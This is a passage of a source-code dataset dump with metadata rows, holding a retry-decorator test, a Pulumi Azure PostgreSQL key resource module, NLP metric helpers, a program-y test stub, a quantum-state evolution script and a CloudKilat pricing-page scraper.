def result_filter(*args):
return mock_callable(*args)
@retrying.retry(retry_on_result_filter=result_filter)
def invoke_callable(*args, **kwargs):
return count_invocations_callable(*args, **kwargs)
return_val = invoke_callable()
self.assertEqual(return_val, expected_return_val)
# Final call succeeds
self.assertEqual(count_invocations_callable.n_invocations,
expected_num_invocations + 1)
def test_result_filter_incur_retry(self):
expected_return_val = 0
expected_num_invocations = 3
count_invocations_callable = CountInvocations(expected_num_invocations,
TypeError('Error'),
expected_return_val)
mock_callable = mock.Mock()
mock_callable.side_effect = [True, False]
def result_filter(*args):
return mock_callable(*args)
@retrying.retry(retry_on_result_filter=result_filter)
def invoke_callable(*args, **kwargs):
return count_invocations_callable(*args, **kwargs)
return_val = invoke_callable()
self.assertEqual(return_val, expected_return_val)
# Final call succeeds
self.assertEqual(count_invocations_callable.n_invocations,
expected_num_invocations + 2)
class RetryingCoroFunctionTest(absltest.TestCase):
def setUp(self):
self._loop = asyncio.new_event_loop()
super().setUp()
def _run_sync(self, fn, args=None):
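    # Drive the coroutine to completion synchronously on the test's own loop.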
return self._loop.run_until_complete(fn(args))
def test_standalone_decorator_always_retries(self):
expected_return_val = 0
expected_num_invocations = 3
count_invocations_callable = CountInvocations(expected_num_invocations,
TypeError('Error'),
expected_return_val)
@retrying.retry
async def invoke_callable(*args, **kwargs):
return count_invocations_callable(*args, **kwargs)
return_val = self._run_sync(invoke_callable)
self.assertEqual(return_val, expected_return_val)
# Final call succeeds
self.assertEqual(count_invocations_callable.n_invocations,
expected_num_invocations + 1)
def test_error_filter_raises_wrong_error_type(self):
count_invocations_callable = CountInvocations(1, TypeError('Error'), 0)
@retrying.retry(
retry_on_exception_filter=lambda e: isinstance(e, ValueError))
async def invoke_callable(*args, **kwargs):
return count_invocations_callable(*args, **kwargs)
with self.assertRaises(TypeError):
self._run_sync(invoke_callable)
def test_error_filter_called_with_raised_err(self):
error = TypeError('error')
expected_result = 1
count_invocations_callable = CountInvocations(1, error, 1)
mock_callable = mock.MagicMock(return_value=True)
def err_filter(*args):
return mock_callable(*args)
@retrying.retry(retry_on_exception_filter=err_filter)
async def invoke_callable(*args, **kwargs):
return count_invocations_callable(*args, **kwargs)
result = self._run_sync(invoke_callable)
self.assertEqual(result, expected_result)
mock_callable.assert_called_once_with(error)
def test_result_filter_not_incur_retry(self):
expected_result = 0
expected_num_invocations = 3
count_invocations_callable = CountInvocations(expected_num_invocations,
TypeError('Error'),
expected_result)
mock_callable = mock.MagicMock(return_value=False)
def result_filter(*args):
return mock_callable(*args)
@retrying.retry(retry_on_result_filter=result_filter)
async def invoke_callable(*args, **kwargs):
return count_invocations_callable(*args, **kwargs)
result = self._run_sync(invoke_callable)
self.assertEqual(result, expected_result)
# Final call succeeds
self.assertEqual(count_invocations_callable.n_invocations,
expected_num_invocations + 1)
def test_result_filter_incur_retry(self):
expected_result = 0
expected_num_invocations = 3
count_invocations_callable = CountInvocations(expected_num_invocations,
TypeError('Error'),
expected_result)
mock_callable = mock.Mock()
mock_callable.side_effect = [True, False]
def result_filter(*args):
return mock_callable(*args)
@retrying.retry(retry_on_result_filter=result_filter)
async def invoke_callable(*args, **kwargs):
return count_invocations_callable(*args, **kwargs)
result = self._run_sync(invoke_callable)
self.assertEqual(result, expected_result)
# Final call succeeds
self.assertEqual(count_invocations_callable.n_invocations,
expected_num_invocations + 2)
if __name__ == '__main__':
absltest.main()
| 33.556738 | 76 | 0.702209 | 1,108 | 9,463 | 5.647112 | 0.148014 | 0.066486 | 0.099728 | 0.0537 | 0.802781 | 0.775292 | 0.762826 | 0.758191 | 0.747323 | 0.745725 | 0 | 0.006088 | 0.218958 | 9,463 | 281 | 77 | 33.676157 | 0.840482 | 0.073867 | 0 | 0.736559 | 0 | 0 | 0.006634 | 0 | 0 | 0 | 0 | 0 | 0.134409 | 1 | 0.177419 | false | 0 | 0.026882 | 0.069892 | 0.327957 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6fd6e99e23904f16be4009b0996a92e4afa2c22f | 14,282 | py | Python | sdk/python/pulumi_azure/postgresql/server_key.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 109 | 2018-06-18T00:19:44.000Z | 2022-02-20T05:32:57.000Z | sdk/python/pulumi_azure/postgresql/server_key.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 663 | 2018-06-18T21:08:46.000Z | 2022-03-31T20:10:11.000Z | sdk/python/pulumi_azure/postgresql/server_key.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 41 | 2018-07-19T22:37:38.000Z | 2022-03-14T10:56:26.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['ServerKeyArgs', 'ServerKey']
@pulumi.input_type
class ServerKeyArgs:
def __init__(__self__, *,
key_vault_key_id: pulumi.Input[str],
server_id: pulumi.Input[str]):
"""
The set of arguments for constructing a ServerKey resource.
:param pulumi.Input[str] key_vault_key_id: The URL to a Key Vault Key.
:param pulumi.Input[str] server_id: The ID of the PostgreSQL Server. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "key_vault_key_id", key_vault_key_id)
pulumi.set(__self__, "server_id", server_id)
@property
@pulumi.getter(name="keyVaultKeyId")
def key_vault_key_id(self) -> pulumi.Input[str]:
"""
The URL to a Key Vault Key.
"""
return pulumi.get(self, "key_vault_key_id")
@key_vault_key_id.setter
def key_vault_key_id(self, value: pulumi.Input[str]):
pulumi.set(self, "key_vault_key_id", value)
@property
@pulumi.getter(name="serverId")
def server_id(self) -> pulumi.Input[str]:
"""
The ID of the PostgreSQL Server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server_id")
@server_id.setter
def server_id(self, value: pulumi.Input[str]):
pulumi.set(self, "server_id", value)
@pulumi.input_type
class _ServerKeyState:
def __init__(__self__, *,
key_vault_key_id: Optional[pulumi.Input[str]] = None,
server_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering ServerKey resources.
:param pulumi.Input[str] key_vault_key_id: The URL to a Key Vault Key.
:param pulumi.Input[str] server_id: The ID of the PostgreSQL Server. Changing this forces a new resource to be created.
"""
if key_vault_key_id is not None:
pulumi.set(__self__, "key_vault_key_id", key_vault_key_id)
if server_id is not None:
pulumi.set(__self__, "server_id", server_id)
@property
@pulumi.getter(name="keyVaultKeyId")
def key_vault_key_id(self) -> Optional[pulumi.Input[str]]:
"""
The URL to a Key Vault Key.
"""
return pulumi.get(self, "key_vault_key_id")
@key_vault_key_id.setter
def key_vault_key_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key_vault_key_id", value)
@property
@pulumi.getter(name="serverId")
def server_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the PostgreSQL Server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server_id")
@server_id.setter
def server_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "server_id", value)
class ServerKey(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
key_vault_key_id: Optional[pulumi.Input[str]] = None,
server_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a Customer Managed Key for a PostgreSQL Server.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
current = azure.core.get_client_config()
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_key_vault = azure.keyvault.KeyVault("exampleKeyVault",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
tenant_id=current.tenant_id,
sku_name="premium",
purge_protection_enabled=True)
example_server = azure.postgresql.Server("exampleServer",
location=azurerm_resource_group["test"]["location"],
resource_group_name=azurerm_resource_group["test"]["name"],
administrator_login="psqladmin",
administrator_login_password="H@Sh1CoR3!",
sku_name="GP_Gen5_2",
version="11",
storage_mb=51200,
ssl_enforcement_enabled=True,
identity=azure.postgresql.ServerIdentityArgs(
type="SystemAssigned",
))
server = azure.keyvault.AccessPolicy("server",
key_vault_id=example_key_vault.id,
tenant_id=current.tenant_id,
object_id=example_server.identity.principal_id,
key_permissions=[
"get",
"unwrapkey",
"wrapkey",
],
secret_permissions=["get"])
client = azure.keyvault.AccessPolicy("client",
key_vault_id=example_key_vault.id,
tenant_id=current.tenant_id,
object_id=current.object_id,
key_permissions=[
"get",
"create",
"delete",
"list",
"restore",
"recover",
"unwrapkey",
"wrapkey",
"purge",
"encrypt",
"decrypt",
"sign",
"verify",
],
secret_permissions=["get"])
example_key = azure.keyvault.Key("exampleKey",
key_vault_id=example_key_vault.id,
key_type="RSA",
key_size=2048,
key_opts=[
"decrypt",
"encrypt",
"sign",
"unwrapKey",
"verify",
"wrapKey",
],
opts=pulumi.ResourceOptions(depends_on=[
client,
server,
]))
example_server_key = azure.postgresql.ServerKey("exampleServerKey",
server_id=example_server.id,
key_vault_key_id=example_key.id)
```
## Import
A PostgreSQL Server Key can be imported using the `resource id` of the PostgreSQL Server Key, e.g.
```sh
$ pulumi import azure:postgresql/serverKey:ServerKey example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.DBforPostgreSQL/servers/server1/keys/keyvaultname_key-name_keyversion
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] key_vault_key_id: The URL to a Key Vault Key.
:param pulumi.Input[str] server_id: The ID of the PostgreSQL Server. Changing this forces a new resource to be created.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ServerKeyArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a Customer Managed Key for a PostgreSQL Server.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
current = azure.core.get_client_config()
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_key_vault = azure.keyvault.KeyVault("exampleKeyVault",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
tenant_id=current.tenant_id,
sku_name="premium",
purge_protection_enabled=True)
example_server = azure.postgresql.Server("exampleServer",
location=azurerm_resource_group["test"]["location"],
resource_group_name=azurerm_resource_group["test"]["name"],
administrator_login="psqladmin",
administrator_login_password="H@Sh1CoR3!",
sku_name="GP_Gen5_2",
version="11",
storage_mb=51200,
ssl_enforcement_enabled=True,
identity=azure.postgresql.ServerIdentityArgs(
type="SystemAssigned",
))
server = azure.keyvault.AccessPolicy("server",
key_vault_id=example_key_vault.id,
tenant_id=current.tenant_id,
object_id=example_server.identity.principal_id,
key_permissions=[
"get",
"unwrapkey",
"wrapkey",
],
secret_permissions=["get"])
client = azure.keyvault.AccessPolicy("client",
key_vault_id=example_key_vault.id,
tenant_id=current.tenant_id,
object_id=current.object_id,
key_permissions=[
"get",
"create",
"delete",
"list",
"restore",
"recover",
"unwrapkey",
"wrapkey",
"purge",
"encrypt",
"decrypt",
"sign",
"verify",
],
secret_permissions=["get"])
example_key = azure.keyvault.Key("exampleKey",
key_vault_id=example_key_vault.id,
key_type="RSA",
key_size=2048,
key_opts=[
"decrypt",
"encrypt",
"sign",
"unwrapKey",
"verify",
"wrapKey",
],
opts=pulumi.ResourceOptions(depends_on=[
client,
server,
]))
example_server_key = azure.postgresql.ServerKey("exampleServerKey",
server_id=example_server.id,
key_vault_key_id=example_key.id)
```
## Import
A PostgreSQL Server Key can be imported using the `resource id` of the PostgreSQL Server Key, e.g.
```sh
$ pulumi import azure:postgresql/serverKey:ServerKey example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.DBforPostgreSQL/servers/server1/keys/keyvaultname_key-name_keyversion
```
:param str resource_name: The name of the resource.
:param ServerKeyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
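        # Dispatch between the two overloads above: a bundled ServerKeyArgs
        # object or individual keyword arguments.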
resource_args, opts = _utilities.get_resource_args_opts(ServerKeyArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
key_vault_key_id: Optional[pulumi.Input[str]] = None,
server_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ServerKeyArgs.__new__(ServerKeyArgs)
if key_vault_key_id is None and not opts.urn:
raise TypeError("Missing required property 'key_vault_key_id'")
__props__.__dict__["key_vault_key_id"] = key_vault_key_id
if server_id is None and not opts.urn:
raise TypeError("Missing required property 'server_id'")
__props__.__dict__["server_id"] = server_id
super(ServerKey, __self__).__init__(
'azure:postgresql/serverKey:ServerKey',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
key_vault_key_id: Optional[pulumi.Input[str]] = None,
server_id: Optional[pulumi.Input[str]] = None) -> 'ServerKey':
"""
Get an existing ServerKey resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] key_vault_key_id: The URL to a Key Vault Key.
:param pulumi.Input[str] server_id: The ID of the PostgreSQL Server. Changing this forces a new resource to be created.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ServerKeyState.__new__(_ServerKeyState)
__props__.__dict__["key_vault_key_id"] = key_vault_key_id
__props__.__dict__["server_id"] = server_id
return ServerKey(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="keyVaultKeyId")
def key_vault_key_id(self) -> pulumi.Output[str]:
"""
The URL to a Key Vault Key.
"""
return pulumi.get(self, "key_vault_key_id")
@property
@pulumi.getter(name="serverId")
def server_id(self) -> pulumi.Output[str]:
"""
The ID of the PostgreSQL Server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server_id")
| 38.915531 | 233 | 0.600616 | 1,570 | 14,282 | 5.164968 | 0.142038 | 0.054261 | 0.055617 | 0.054507 | 0.812184 | 0.79233 | 0.78604 | 0.761376 | 0.755087 | 0.748551 | 0 | 0.009971 | 0.304789 | 14,282 | 366 | 234 | 39.021858 | 0.806728 | 0.502101 | 0 | 0.495727 | 1 | 0 | 0.108728 | 0.006601 | 0 | 0 | 0 | 0 | 0 | 1 | 0.145299 | false | 0.008547 | 0.042735 | 0 | 0.273504 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6fef3b686ca410f8ffd2132f27de000372819c26 | 1,287 | py | Python | src/model/metric.py | nobu-g/cohesion-analysis | bf2e22c1aff51f96fd2aaef6359839646548c3be | [
"MIT"
] | 12 | 2020-12-25T11:13:17.000Z | 2021-12-28T05:19:46.000Z | src/model/metric.py | nobu-g/cohesion-analysis | bf2e22c1aff51f96fd2aaef6359839646548c3be | [
"MIT"
] | 1 | 2020-12-25T09:26:26.000Z | 2020-12-25T09:26:34.000Z | src/model/metric.py | nobu-g/cohesion-analysis | bf2e22c1aff51f96fd2aaef6359839646548c3be | [
"MIT"
] | 1 | 2022-02-25T13:22:47.000Z | 2022-02-25T13:22:47.000Z | def case_analysis_f1_ga(result: dict):
return result['ガ']['dep'].f1
def case_analysis_f1_wo(result: dict):
return result['ヲ']['dep'].f1
def case_analysis_f1_ni(result: dict):
return result['ニ']['dep'].f1
def case_analysis_f1_ga2(result: dict):
return result['ガ2']['dep'].f1
def case_analysis_f1(result: dict):
return result['all_case']['dep'].f1
def zero_anaphora_f1_ga(result: dict):
return result['ガ']['zero'].f1
def zero_anaphora_f1_wo(result: dict):
return result['ヲ']['zero'].f1
def zero_anaphora_f1_ni(result: dict):
return result['ニ']['zero'].f1
def zero_anaphora_f1_ga2(result: dict):
return result['ガ2']['zero'].f1
def zero_anaphora_f1(result: dict):
return result['all_case']['zero'].f1
def zero_anaphora_f1_inter(result: dict):
return result['all_case']['zero_inter'].f1
def zero_anaphora_f1_intra(result: dict):
return result['all_case']['zero_intra'].f1
def zero_anaphora_f1_exophora(result: dict):
return result['all_case']['zero_exophora'].f1
def pas_analysis_f1(result: dict):
return result['all_case']['dep_zero'].f1
def coreference_f1(result: dict):
return result['all_case']['coreference'].f1
def bridging_anaphora_f1(result: dict):
return result['all_case']['bridging'].f1
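# Minimal usage sketch: every helper above reads a nested `result` dict keyed
# first by case name ('ガ', 'ヲ', 'ニ', 'ガ2', or 'all_case') and then by
# analysis type ('dep', 'zero', 'coreference', ...), whose value exposes an
# `.f1` attribute. The shape below is illustrative only.
#
#   from types import SimpleNamespace
#   result = {'all_case': {'dep': SimpleNamespace(f1=0.85)}}
#   assert case_analysis_f1(result) == 0.85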
| 20.428571 | 49 | 0.703186 | 198 | 1,287 | 4.29798 | 0.126263 | 0.188014 | 0.300823 | 0.413631 | 0.867215 | 0.802585 | 0.606345 | 0.190364 | 0.098707 | 0 | 0 | 0.032345 | 0.135198 | 1,287 | 62 | 50 | 20.758065 | 0.732255 | 0 | 0 | 0 | 0 | 0 | 0.131313 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
6ff955ea7b973ffeed67819eaa13272800cb4a52 | 157 | py | Python | test/programytest/parser/pattern/matching/test_wildcard_branches.py | NeolithEra/program-y | 8c2396611f30c8095e98ff02988223a641c1a3be | [
"MIT"
] | 345 | 2016-11-23T22:37:04.000Z | 2022-03-30T20:44:44.000Z | test/programytest/parser/pattern/matching/test_wildcard_branches.py | MikeyBeez/program-y | 00d7a0c7d50062f18f0ab6f4a041068e119ef7f0 | [
"MIT"
] | 275 | 2016-12-07T10:30:28.000Z | 2022-02-08T21:28:33.000Z | test/programytest/parser/pattern/matching/test_wildcard_branches.py | VProgramMist/modified-program-y | f32efcafafd773683b3fe30054d5485fe9002b7d | [
"MIT"
] | 159 | 2016-11-28T18:59:30.000Z | 2022-03-20T18:02:44.000Z | from programytest.parser.pattern.matching.base import PatternMatcherBaseClass
class PatternMatcherWildcardBranchesTests(PatternMatcherBaseClass):
    # All matching tests are inherited unchanged from PatternMatcherBaseClass.
    pass
| 26.166667 | 77 | 0.872611 | 12 | 157 | 11.416667 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.082803 | 157 | 5 | 78 | 31.4 | 0.951389 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
965fc8f5db1a76163eedd0046de36d77430c704c | 1,316 | py | Python | Scripts/evolve_script.py | zeldredge/py-nqs | 1bf2545678f71a61ff309e61063930766e5cc63d | [
"Unlicense",
"MIT"
] | 11 | 2019-08-03T04:44:24.000Z | 2021-11-04T18:25:22.000Z | Scripts/evolve_script.py | zeldredge/py-nqs | 1bf2545678f71a61ff309e61063930766e5cc63d | [
"Unlicense",
"MIT"
] | null | null | null | Scripts/evolve_script.py | zeldredge/py-nqs | 1bf2545678f71a61ff309e61063930766e5cc63d | [
"Unlicense",
"MIT"
] | 3 | 2019-07-24T04:34:27.000Z | 2021-11-05T19:01:06.000Z | import numpy as np
import trainer
import ising1d
import nqs
import sampler
import evolver
import observables
nsteps = 400
### INITIALIZATION
wf = nqs.NqsLocal(10, 2, 1) # Set up a translation-invariant neural network
wf.load_parameters('../Outputs/10_Ising05_2loc_200.npz') # Load this pre-trained ANNQS
## TIME EVOLVE
h = ising1d.Ising1d(10, 1.0)
evo = evolver.Evolver(h)
wf = evo.evolve(wf, .01, nsteps + 1, symmetry="local", file='../Outputs/10SpinEvolve/evolution_2loc_', print_freq=25, out_freq=1, batch_size=1000)
### INITIALIZATION
wf = nqs.NqsLocal(10, 1, 1) # Set up a translation-invariant neural network
wf.load_parameters('../Outputs/10_Ising05_1loc_200.npz') # Load this pre-trained ANNQS
## TIME EVOLVE
h = ising1d.Ising1d(10, 1.0)
evo = evolver.Evolver(h)
wf = evo.evolve(wf, .01, nsteps + 1, symmetry="local", file='../Outputs/10SpinEvolve/evolution_1loc_', print_freq=25, out_freq=1, batch_size=1000)
### INITIALIZATION
wf = nqs.NqsTI(10, 1) # Set up a translation-invariant neural network
wf.load_parameters('../Outputs/10_Ising05_ti_200.npz') # Load this pre-trained ANNQS
## TIME EVOLVE
h = ising1d.Ising1d(10, 1.0)
evo = evolver.Evolver(h)
wf = evo.evolve(wf, .01, nsteps + 1, symmetry="ti", file='../Outputs/10SpinEvolve/evolution_ti_', print_freq=25, out_freq=1, batch_size=1000)
| 35.567568 | 146 | 0.739362 | 206 | 1,316 | 4.592233 | 0.276699 | 0.015856 | 0.060254 | 0.022199 | 0.825581 | 0.784355 | 0.784355 | 0.784355 | 0.784355 | 0.750529 | 0 | 0.081104 | 0.119301 | 1,316 | 36 | 147 | 36.555556 | 0.735116 | 0.229483 | 0 | 0.26087 | 0 | 0 | 0.228831 | 0.216734 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.304348 | 0 | 0.304348 | 0.130435 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
96bb9c5fd24559b0f6e8808492f5030345d02869 | 8,337 | py | Python | crawler/module/cloudkilat.py | riszkymf/pricefinder | 0f2625a90d176ed3e2772a1ec65d60c464290f8f | [
"MIT"
] | null | null | null | crawler/module/cloudkilat.py | riszkymf/pricefinder | 0f2625a90d176ed3e2772a1ec65d60c464290f8f | [
"MIT"
] | 3 | 2021-03-31T19:04:46.000Z | 2022-03-02T14:57:49.000Z | crawler/module/cloudkilat.py | riszkymf/pricefinder | 0f2625a90d176ed3e2772a1ec65d60c464290f8f | [
"MIT"
] | null | null | null | from bs4 import BeautifulSoup
from crawler.libs.util import get_page
base_url = 'http://www.cloudkilat.com'
company_name = 'cloudkilat'
class VM(object):
endpoint = '/layanan/kilat-vm-2.0#harga'
product_name = "VM 2.0"
def __init__(self, **kwargs):
self.company_name = company_name
        for key, value in kwargs.items():
            try:
                setattr(self, key, value)
            except Exception:
                print("Cannot set value")
def run(self):
self.url = base_url+self.endpoint
result = get_page(self.url)
self.status_code = result.status_code
data = self.soup_parser(result)
self.data = data
def soup_parser(self, result):
page = result.text
res = BeautifulSoup(page, "html.parser")
items = res.find_all("li", class_="item-none")
        result_data = []
        header = []  # column names; populated when the 'list-header' row is reached
for item in items:
d = {}
if 'list-header' not in item['class']:
d['Type'] = item.h4.text
d['Duration'] = item.find('div', class_='duration').get_text(strip=True).replace(" ","").replace("\n"," ")
specs = item.find('div', class_='spesifications')
specs_details = specs.find_all('div', class_='value')
for key, value in zip(header, specs_details):
d[key] = value.get_text(strip=True)
d['price'] = item.h5.text
d['notes'] = item.find('div', class_='notes').text
result_data.append(d)
else:
header = [i.get_text(strip=True).replace(" ","_") for i in item.find_all('div',class_='item')]
return result_data
class ObjectStorage(object):
endpoint = "/layanan/kilat-storage#harga"
product_name = "Object Storage"
def __init__(self, **kwargs):
self.company_name = company_name
        for key, value in kwargs.items():
            try:
                setattr(self, key, value)
            except Exception:
                print("Cannot set value")
def run(self):
self.url = base_url + self.endpoint
result = get_page(self.url)
self.status_code = result.status_code
data = self.soup_parser(result)
self.data = data
def soup_parser(self, result):
page = result.text
res = BeautifulSoup(page, "html.parser")
price_area = res.find('ul', class_="price-list")
items = price_area.find_all('li', class_='item-none')
result_data = list()
for item in items:
d = {}
d['Type'] = item.find('h4', class_='type').text
d['Duration'] = item.find('div', class_='duration').get_text(strip=True).replace(" ","").replace("\n"," ")
specs = zip(item.select("div.columns.item"),item.select("div.columns.value"))
for key, value in specs:
key = key.get_text(strip=True)
value = value.get_text(strip=True)
d[key] = value
d['Price'] = item.find('h5', class_='price').text
result_data.append(d)
return result_data
class Plesk(object):
endpoint = "/layanan/kilat-plesk#harga"
product_name = "Plesk"
def __init__(self, **kwargs):
self.company_name = company_name
        for key, value in kwargs.items():
            try:
                setattr(self, key, value)
            except Exception:
                print("Cannot set value")
def run(self):
self.url = base_url + self.endpoint
result = get_page(self.url)
self.status_code = result.status_code
data = self.soup_parser(result)
self.data = data
def soup_parser(self, result):
page = result.text
res = BeautifulSoup(page, "html.parser")
price_area = res.find('ul', class_="price-list")
items = price_area.find_all('li', class_='item-none')
result_data = list()
for item in items:
d = {}
d['duration'] = item.find('div',class_='duration').get_text(strip=True).replace(" ","").replace("\n"," ")
specs = zip(item.select("div.columns.item"),item.select("div.columns.value"))
for key, value in specs:
key = key.get_text(strip=True)
value = value.get_text(strip=True)
d[key] = value
d['price'] = item.find('h5', class_='price').text
result_data.append(d)
return result_data
class Hosting(object):
endpoint = '/layanan/kilat-hosting'
product_name = "hosting"
def __init__(self, **kwargs):
self.company_name = company_name
        for key, value in kwargs.items():
            try:
                setattr(self, key, value)
            except Exception:
                print("Cannot set value")
def run(self):
self.url = base_url + self.endpoint
result = get_page(self.url)
self.status_code = result.status_code
data = self.soup_parser(result)
self.data = data
def soup_parser(self, result):
page = result.text
res = BeautifulSoup(page, "html.parser")
result_data = list()
d = {}
price_area = res.find('div', class_='pricing')
d['duration'] = price_area.find('div', class_='duration').get_text(strip=True).replace(" ", "").replace("\n"," ")
d['price'] = price_area.find('h1', class_='price').text
features = res.find('div', class_='summary')
features = features.find('ul')
features_str = []
items = features.find_all('li')
for item in items:
txt = item.text.replace('\n',' ').rstrip(' ').lstrip(' ')
features_str.append(txt)
d['features'] = features_str
result_data.append(d)
return result_data
class KilatIron(object):
endpoint = '/layanan/kilat-iron'
product_name = "Iron"
def __init__(self, **kwargs):
self.company_name = company_name
        for key, value in kwargs.items():
            try:
                setattr(self, key, value)
            except Exception:
                print("Cannot set value")
def run(self):
self.url = base_url + self.endpoint
result = get_page(self.url)
self.status_code = result.status_code
data = self.soup_parser(result)
self.data = data
def soup_parser(self, result):
page = result.text
res = BeautifulSoup(page, "html.parser")
result_data = list()
d = {}
price_area = res.find('div', class_='pricing')
d['duration'] = price_area.find('div', class_='duration').get_text(strip=True).replace(" ", "").replace("\n"," ")
d['price'] = price_area.find('h1', class_='price').text
features = res.find('div', class_='summary')
features = features.find('ul')
features_str = []
items = features.find_all('li')
for item in items:
txt = item.text.replace('\n', ' ').rstrip(' ').lstrip(' ')
features_str.append(txt)
d['features'] = features_str
result_data.append(d)
return result_data
class Domain(object):
endpoint = '/layanan/kilat-domain'
product_name = "domain"
def __init__(self, **kwargs):
self.company_name = company_name
        for key, value in kwargs.items():
            try:
                setattr(self, key, value)
            except Exception:
                print("Cannot set value")
def run(self):
self.url = base_url + self.endpoint
result = get_page(self.url)
self.status_code = result.status_code
data = self.soup_parser(result)
self.data = data
def soup_parser(self, result):
result_data = list()
page = result.text
res = BeautifulSoup(page, "html.parser")
table = res.find('table', class_='price-table').find('tbody')
keys = ["domain", "baru", "perpanjang", "harga"]
rows = table.find_all('tr')
for row in rows:
d = {}
cells = row.find_all('td')
for key, value in zip(keys, cells):
d[key] = value.text
result_data.append(d)
return result_data
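# Hypothetical driver sketch: every product class above shares the same
# run()/soup_parser() contract (live HTTP access via get_page is required),
# so all CloudKilat products can be scraped uniformly:
#
#   if __name__ == '__main__':
#       for cls in (VM, ObjectStorage, Plesk, Hosting, KilatIron, Domain):
#           product = cls()
#           product.run()
#           print(product.product_name, product.data)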
